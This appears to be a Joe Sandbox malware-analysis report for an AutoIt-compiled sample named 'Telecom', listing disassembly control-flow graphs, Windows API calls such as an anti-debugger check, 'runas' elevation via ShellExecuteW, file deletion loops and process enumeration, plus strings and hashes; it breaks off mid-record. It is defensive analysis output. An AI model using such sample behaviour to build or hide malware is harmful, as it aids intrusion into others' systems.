                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00443368,?), ref: 004433BB
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00443368,?), ref: 004433CE
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00512418,00512400,?,?,?,?,?,?,00443368,?), ref: 0044343A
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                        • Part of subcall function 0044425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00443462,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004442A0
                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,00512418,?,?,?,?,?,?,?,00443368,?), ref: 004434BB
                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00483CB0
                                                      • SetCurrentDirectoryW.KERNEL32(?,00512418,?,?,?,?,?,?,?,00443368,?), ref: 00483CF1
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005031F4,00512418,?,?,?,?,?,?,?,00443368), ref: 00483D7A
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00483D81
                                                        • Part of subcall function 004434D3: GetSysColorBrush.USER32(0000000F), ref: 004434DE
                                                        • Part of subcall function 004434D3: LoadCursorW.USER32(00000000,00007F00), ref: 004434ED
                                                        • Part of subcall function 004434D3: LoadIconW.USER32(00000063), ref: 00443503
                                                        • Part of subcall function 004434D3: LoadIconW.USER32(000000A4), ref: 00443515
                                                        • Part of subcall function 004434D3: LoadIconW.USER32(000000A2), ref: 00443527
                                                        • Part of subcall function 004434D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0044353F
                                                        • Part of subcall function 004434D3: RegisterClassExW.USER32(?), ref: 00443590
                                                        • Part of subcall function 004435B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004435E1
                                                        • Part of subcall function 004435B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00443602
                                                        • Part of subcall function 004435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 00443616
                                                        • Part of subcall function 004435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 0044361F
                                                        • Part of subcall function 0044396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00443A3C
                                                      Strings
                                                      • 0$Q, xrefs: 00443495
                                                      • AutoIt, xrefs: 00483CA5
                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00483CAA
                                                      • runas, xrefs: 00483D75
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                      • String ID: 0$Q$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                      • API String ID: 683915450-2616915822
                                                      • Opcode ID: c644739c6ff8c20eeaf8f1d6cd79d6e324e0d1a4f731e5e2bd752c7af8fb0851
                                                      • Instruction ID: d04014d526585b994edaf438d56b542ea76a1f68129a70cabd6e42594293b5a8
                                                      • Opcode Fuzzy Hash: c644739c6ff8c20eeaf8f1d6cd79d6e324e0d1a4f731e5e2bd752c7af8fb0851
                                                      • Instruction Fuzzy Hash: 15512570108340AAFB01FF619C11DEE7FA8AF95B09F00082FF491521A2CB6C9A5DD76B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1487 4ad921-4ad97f call 44bf73 * 3 call 445851 * 2 call 4aea43 call 4aeab0 1502 4ad98a-4ad994 call 4aeab0 1487->1502 1503 4ad981-4ad985 call 446b7c 1487->1503 1507 4ad99f-4ad9dd call 44bf73 * 2 call 44568e FindFirstFileW 1502->1507 1508 4ad996-4ad99a call 446b7c 1502->1508 1503->1502 1516 4adb0e-4adb15 FindClose 1507->1516 1517 4ad9e3 1507->1517 1508->1507 1519 4adb18-4adb46 call 44bd98 * 5 1516->1519 1518 4ad9e9-4ad9eb 1517->1518 1518->1516 1521 4ad9f1-4ad9f8 1518->1521 1523 4adada-4adaed FindNextFileW 1521->1523 1524 4ad9fe-4ada64 call 44b329 call 4ae070 call 44bd98 call 447bb5 call 446b7c call 4add79 1521->1524 1523->1518 1527 4adaf3-4adaf8 1523->1527 1546 4ada8a-4ada8e 1524->1546 1547 4ada66-4ada69 1524->1547 1527->1518 1550 4adabc-4adac2 call 4adb47 1546->1550 1551 4ada90-4ada93 1546->1551 1548 4ada6f-4ada86 call 45e36b 1547->1548 1549 4adafd-4adb0c FindClose call 44bd98 1547->1549 1560 4ada98-4adaa1 MoveFileW 1548->1560 1564 4ada88 DeleteFileW 1548->1564 1549->1519 1557 4adac7 1550->1557 1555 4adaa3-4adab3 call 4adb47 1551->1555 1556 4ada95 1551->1556 1555->1549 1565 4adab5-4adaba DeleteFileW 1555->1565 1556->1560 1563 4adaca-4adacc 1557->1563 1560->1563 1563->1549 1566 4adace-4adad6 call 44bd98 1563->1566 1564->1546 1565->1563 1566->1523
                                                      APIs
                                                        • Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871
                                                        • Part of subcall function 004AEAB0: GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004AD9CD
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004ADA88
                                                      • MoveFileW.KERNEL32(?,?), ref: 004ADA9B
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 004ADAB8
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 004ADAE2
                                                        • Part of subcall function 004ADB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004ADAC7,?,?), ref: 004ADB5D
                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 004ADAFE
                                                      • FindClose.KERNEL32(00000000), ref: 004ADB0F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 1946585618-1173974218
                                                      • Opcode ID: 9b881a27d824f46e858c3e2972ae9761f3164ec4d52d5df1999622ef4994afc7
                                                      • Instruction ID: 9137cbd3817686c794384435e65a7089822a4ba1c39e31a2414d5c964fb91e64
                                                      • Opcode Fuzzy Hash: 9b881a27d824f46e858c3e2972ae9761f3164ec4d52d5df1999622ef4994afc7
                                                      • Instruction Fuzzy Hash: 96614171C0110DAEDF05EBA1D9529EEB775EF25304F2040AAE40677191DB39AF09CFA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1720 4adc54-4adc9b call 44bf73 * 3 call 445851 call 4aeab0 1731 4adcab-4adcdc call 44568e FindFirstFileW 1720->1731 1732 4adc9d-4adca6 call 446b7c 1720->1732 1736 4add4b-4add52 FindClose 1731->1736 1737 4adcde-4adce0 1731->1737 1732->1731 1738 4add56-4add78 call 44bd98 * 3 1736->1738 1737->1736 1739 4adce2-4adce7 1737->1739 1741 4adce9-4add24 call 44bed9 call 447bb5 call 446b7c DeleteFileW 1739->1741 1742 4add26-4add38 FindNextFileW 1739->1742 1741->1742 1755 4add42-4add49 FindClose 1741->1755 1742->1737 1743 4add3a-4add40 1742->1743 1743->1737 1755->1738
                                                      APIs
                                                        • Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871
                                                        • Part of subcall function 004AEAB0: GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004ADCCB
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 004ADD1B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004ADD2C
                                                      • FindClose.KERNEL32(00000000), ref: 004ADD43
                                                      • FindClose.KERNEL32(00000000), ref: 004ADD4C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: fa510bf34ff012415f589d56c62a076f101a54dd0960699662fdd38453611304
                                                      • Instruction ID: cb1f4f8df178f7a7cc6f39b67ea2685dcb42b18f2c246de703c65dc2e76d1620
                                                      • Opcode Fuzzy Hash: fa510bf34ff012415f589d56c62a076f101a54dd0960699662fdd38453611304
                                                      • Instruction Fuzzy Hash: 9A3182714093459BD301EF60C8858AFB7E8BEA6304F404D6FF4D682191EB28DA09CB9B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 004ADDAC
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 004ADDBA
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 004ADDDA
                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 004ADE87
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3243318325-0
                                                      • Opcode ID: cd6cfdfa6dca73a990eb47be73b4fd742b2e9c3ca8d0fd3123f46d702b4657b8
                                                      • Instruction ID: a4eebda263b7245bcb07a4ed22e6381fca6684701b5eb4047d21aeb9a75a83a5
                                                      • Opcode Fuzzy Hash: cd6cfdfa6dca73a990eb47be73b4fd742b2e9c3ca8d0fd3123f46d702b4657b8
                                                      • Instruction Fuzzy Hash: 0031A2724083019FD304EF61CC85AAFBBE8EFA9344F04092EF586871A1DB75D949CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • lstrlenW.KERNEL32(?,004846AC), ref: 004AE482
                                                      • GetFileAttributesW.KERNEL32(?), ref: 004AE491
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004AE4A2
                                                      • FindClose.KERNEL32(00000000), ref: 004AE4AE
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                      • String ID:
                                                      • API String ID: 2695905019-0
                                                      • Opcode ID: 1f8aa09dc265769bc6e8e39cd4d0ad68d02c2e0ac074b38c000e97beb6cf873a
                                                      • Instruction ID: df0c6841eccea40726aa200ae6a1562b3a370eff7c10063a73c27b00cd11e42b
                                                      • Opcode Fuzzy Hash: 1f8aa09dc265769bc6e8e39cd4d0ad68d02c2e0ac074b38c000e97beb6cf873a
                                                      • Instruction Fuzzy Hash: 51F0A030811A205792106738AC0D8AB776DAE27335B504753F876C21E0D7789995869E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 45ac3e-45b063 call 448ec0 call 45bc58 call 44e6a0 7 45b069-45b073 0->7 8 498584-498591 0->8 9 49896b-498979 7->9 10 45b079-45b07e 7->10 11 498593 8->11 12 498596-4985a5 8->12 15 49897b 9->15 16 49897e 9->16 17 45b084-45b090 call 45b5b6 10->17 18 4985b2-4985b4 10->18 11->12 13 4985aa 12->13 14 4985a7 12->14 13->18 14->13 15->16 19 498985-49898e 16->19 23 4985bd 17->23 25 45b096-45b0a3 call 44c98d 17->25 18->23 21 498990 19->21 22 498993 19->22 21->22 27 49899c-4989eb call 44e6a0 call 45bbbe * 2 22->27 26 4985c7 23->26 33 45b0ab-45b0b4 25->33 31 4985cf-4985d2 26->31 61 45b1e0-45b1f5 27->61 68 4989f1-498a03 call 45b5b6 27->68 35 4985d8-498600 call 464cd3 call 447ad5 31->35 36 45b158-45b16f 31->36 34 45b0b8-45b0d6 call 464d98 33->34 53 45b0e5 34->53 54 45b0d8-45b0e1 34->54 79 49862d-498651 call 447b1a call 44bd98 35->79 80 498602-498606 35->80 41 45b175 36->41 42 498954-498957 36->42 46 4988ff-498920 call 44e6a0 41->46 47 45b17b-45b17e 41->47 48 49895d-498960 42->48 49 498a41-498a79 call 44e6a0 call 45bbbe 42->49 46->61 72 498926-498938 call 45b5b6 46->72 50 498729-498743 call 45bbbe 47->50 51 45b184-45b187 47->51 48->27 52 498962-498965 48->52 49->61 104 498a7f-498a91 call 45b5b6 49->104 90 498749-49874c 50->90 91 49888f-4988b5 call 44e6a0 50->91 59 4986ca-4986e0 call 446c03 51->59 60 45b18d-45b190 51->60 52->9 52->61 53->26 64 45b0eb-45b0fc 53->64 54->34 62 45b0e3 54->62 59->61 107 4986e6-4986fc call 45b5b6 59->107 70 45b196-45b1b8 call 44e6a0 60->70 71 498656-498659 60->71 74 498ac9-498acf 61->74 75 45b1fb-45b20b call 44e6a0 61->75 62->64 64->9 73 45b102-45b11c 64->73 95 498a2f-498a3c call 44c98d 68->95 96 498a05-498a0d 68->96 70->61 111 45b1ba-45b1cc call 45b5b6 70->111 71->9 87 49865f-498674 call 446c03 71->87 114 49893a-498943 call 44c98d 72->114 115 498945 72->115 73->31 86 45b122-45b154 call 45bbbe call 44e6a0 73->86 74->33 92 498ad5 74->92 79->71 80->79 81 498608-49862b call 44ad40 80->81 81->79 81->80 86->36 87->61 134 49867a-498690 call 45b5b6 87->134 102 4987bf-4987de call 44e6a0 90->102 103 49874e-498751 90->103 91->61 137 4988bb-4988cd call 45b5b6 91->137 92->9 148 498ac2-498ac4 95->148 109 498a0f-498a13 96->109 110 498a1e-498a29 call 44b4b1 96->110 102->61 140 4987e4-4987f6 call 45b5b6 102->140 117 498ada-498ae8 103->117 118 498757-498774 call 44e6a0 103->118 152 498a93-498a9b 104->152 153 498ab5-498abe call 44c98d 104->153 141 49870d-498716 call 448ec0 107->141 142 4986fe-49870b call 448ec0 107->142 109->110 127 498a15-498a19 109->127 110->95 159 498b0b-498b19 110->159 160 4986ba-4986c3 call 44c98d 111->160 161 45b1d2-45b1de 111->161 133 498949-49894f 114->133 115->133 124 498aea 117->124 125 498aed-498afd 117->125 118->61 163 49877a-49878c call 45b5b6 118->163 124->125 143 498aff 125->143 144 498b02-498b06 125->144 145 498aa1-498aa3 127->145 133->61 173 49869d-4986ab call 448ec0 134->173 174 498692-49869b call 44c98d 134->174 178 4988cf-4988dc call 44c98d 137->178 179 4988de 137->179 140->61 181 4987fc-498805 call 45b5b6 140->181 182 498719-498724 call 448577 141->182 142->182 143->144 144->75 145->61 148->61 164 498aa8-498ab3 call 44b4b1 152->164 165 498a9d 152->165 153->148 170 498b1b 159->170 171 498b1e-498b21 159->171 160->59 161->61 194 49879f 163->194 195 49878e-49879d call 44c98d 163->195 164->153 164->159 165->145 170->171 171->19 202 4986ae-4986b5 173->202 174->202 189 4988e2-4988e9 178->189 179->189 207 498818 181->207 208 498807-498816 call 44c98d 181->208 182->61 197 4988eb-4988f0 call 44396b 189->197 198 4988f5 call 443907 189->198 204 4987a3-4987ae call 469334 194->204 195->204 197->61 206 4988fa 198->206 202->61 204->9 218 4987b4-4987ba 204->218 206->61 213 49881c-49883f 207->213 208->213 216 49884d-498850 213->216 217 498841-498848 213->217 219 498860-498863 216->219 220 498852-49885b 216->220 217->216 218->61 221 498873-498876 219->221 222 498865-49886e 219->222 220->219 221->61 223 49887c-49888a 221->223 222->221 223->61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4M$@M$PM$`*Q$`M$d0b$d10m0$d1b$d1r0,2$d5m0$e#Q$i$tM$tM$(Q$(Q$(Q$(Q$M$M
                                                      • API String ID: 0-1508705815
                                                      • Opcode ID: 9f599c3fb501a1a6ad8beb09ee0a2117303080742560fa6310a057b1a6cb56cd
                                                      • Instruction ID: 7ac7e6557d74d8d1ff3db39b252b295987b7b0838c0d45ded847e7bd7eb3968d
                                                      • Opcode Fuzzy Hash: 9f599c3fb501a1a6ad8beb09ee0a2117303080742560fa6310a057b1a6cb56cd
                                                      • Instruction Fuzzy Hash: E2624C705083419FC724DF19C494A9ABBE1FF89308F14896FE4898B352DB79D949CF8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 224 443eab-443ec6 call 46017b call 46014b 228 443ecb-443edb 224->228 229 443f04-443f16 call 46917b 228->229 230 443edd-443edf 228->230 231 443ee0-443ee6 229->231 237 443f18-443f2a call 46917b 229->237 230->231 233 443ee8-443ef8 call 46013d call 460184 231->233 234 443efb-443f01 231->234 233->234 242 4845ab-4845ad 237->242 243 443f30-443f42 call 46917b 237->243 242->231 247 4845b2-4845b5 243->247 248 443f48-443f5a call 46917b 243->248 247->231 251 4845ba-4845f1 call 4441ea call 444129 call 44404e call 464cd3 248->251 252 443f60-443f72 call 46917b 248->252 280 48462e-484631 251->280 281 4845f3-4845fe 251->281 257 484654-484659 252->257 258 443f78-443f8a call 46917b 252->258 257->231 260 48465f-48467b call 45e36b 257->260 268 443f90-443fa2 call 46917b 258->268 269 48469d-4846ae call 4aa401 258->269 271 484688-484690 260->271 272 48467d-484681 260->272 282 443fa4-443fb6 call 46917b 268->282 283 443fbc 268->283 284 4846b0-4846f8 call 44b329 * 2 call 4453f2 call 443b39 call 44bd98 * 2 269->284 285 484702-484708 269->285 271->231 277 484696 271->277 272->260 276 484683 272->276 276->231 277->269 290 48461c-484629 call 460184 280->290 291 484633-484641 280->291 281->280 289 484600-484607 281->289 282->231 282->283 288 443fbf-443fcb call 44ae4e 283->288 301 48472a-48472c 284->301 329 4846fa-4846fd 284->329 292 48471b-484725 call 4aa215 285->292 307 48470a-48470f 288->307 308 443fd1-443ff4 call 44404e call 444129 call 46917b 288->308 289->290 297 484609-48460d 289->297 290->292 299 484646-48464f call 460184 291->299 292->301 297->290 303 48460f-48461a 297->303 299->231 301->231 303->299 307->231 313 484715-484716 307->313 325 444046-444049 308->325 326 443ff6-444008 call 46917b 308->326 313->292 325->288 326->325 331 44400a-44401c call 46917b 326->331 329->231 334 444032-44403b 331->334 335 44401e-444030 call 46917b 331->335 334->231 337 444041 334->337 335->288 335->334 337->288
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 0-1645009161
                                                      • Opcode ID: acdde903d91805d484003065fb7d08878d6f33474d75111943afb62606f5234a
                                                      • Instruction ID: a2af362615b08f3b7a5e420c007c5b7ff67df9723520888aee41df0d5fc6c5ab
                                                      • Opcode Fuzzy Hash: acdde903d91805d484003065fb7d08878d6f33474d75111943afb62606f5234a
                                                      • Instruction Fuzzy Hash: 0F81E471A40206BBEB10AF61CC42FAF7769AF16744F14401BF905AA281EB7DDE01C79E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00443657
                                                      • RegisterClassExW.USER32(00000030), ref: 00443681
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00443692
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 004436AF
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004436BF
                                                      • LoadIconW.USER32(000000A9), ref: 004436D5
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004436E4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$0+m"D$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-3870507045
                                                      • Opcode ID: e18802f516db09719ce63631f72a70c59e82427d9bbcbf31e6161ba4ff424a55
                                                      • Instruction ID: 40d34d1c500b55205a25c2b639c235dffbb938e45ad41604713048b9d7796320
                                                      • Opcode Fuzzy Hash: e18802f516db09719ce63631f72a70c59e82427d9bbcbf31e6161ba4ff424a55
                                                      • Instruction Fuzzy Hash: 3121F4B5D02308AFDB00DFA8EC89BDDBBB4FB08714F00812AF511A62A0D7B44594DF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 471 44370f-443724 472 443784-443786 471->472 473 443726-443729 471->473 472->473 474 443788 472->474 475 44378a 473->475 476 44372b-443732 473->476 477 44376f-443777 DefWindowProcW 474->477 478 443790-443795 475->478 479 483df4-483e1c call 442f92 call 45f23c 475->479 480 443804-44380c PostQuitMessage 476->480 481 443738-44373d 476->481 482 44377d-443783 477->482 484 443797-44379a 478->484 485 4437bc-4437e3 SetTimer RegisterWindowMessageW 478->485 514 483e21-483e28 479->514 483 4437b8-4437ba 480->483 486 443743-443747 481->486 487 483e61-483e75 call 4ac8f7 481->487 483->482 490 4437a0-4437b3 KillTimer call 443907 call 4459ff 484->490 491 483d95-483d98 484->491 485->483 492 4437e5-4437f0 CreatePopupMenu 485->492 493 44374d-443752 486->493 494 44380e-443818 call 45fcad 486->494 487->483 506 483e7b 487->506 490->483 499 483d9a-483d9e 491->499 500 483dd0-483def MoveWindow 491->500 492->483 502 443758-44375d 493->502 503 483e46-483e4d 493->503 508 44381d 494->508 509 483dbf-483dcb SetFocus 499->509 510 483da0-483da3 499->510 500->483 504 4437f2-443802 call 44381f 502->504 505 443763-443769 502->505 503->477 512 483e53-483e5c call 4a1423 503->512 504->483 505->477 505->514 506->477 508->483 509->483 510->505 515 483da9-483dba call 442f92 510->515 512->477 514->477 519 483e2e-483e41 call 443907 call 44396b 514->519 515->483 519->477
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00443709,?,?), ref: 00443777
                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00443709,?,?), ref: 004437A3
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004437C6
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00443709,?,?), ref: 004437D1
                                                      • CreatePopupMenu.USER32 ref: 004437E5
                                                      • PostQuitMessage.USER32(00000000), ref: 00443806
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
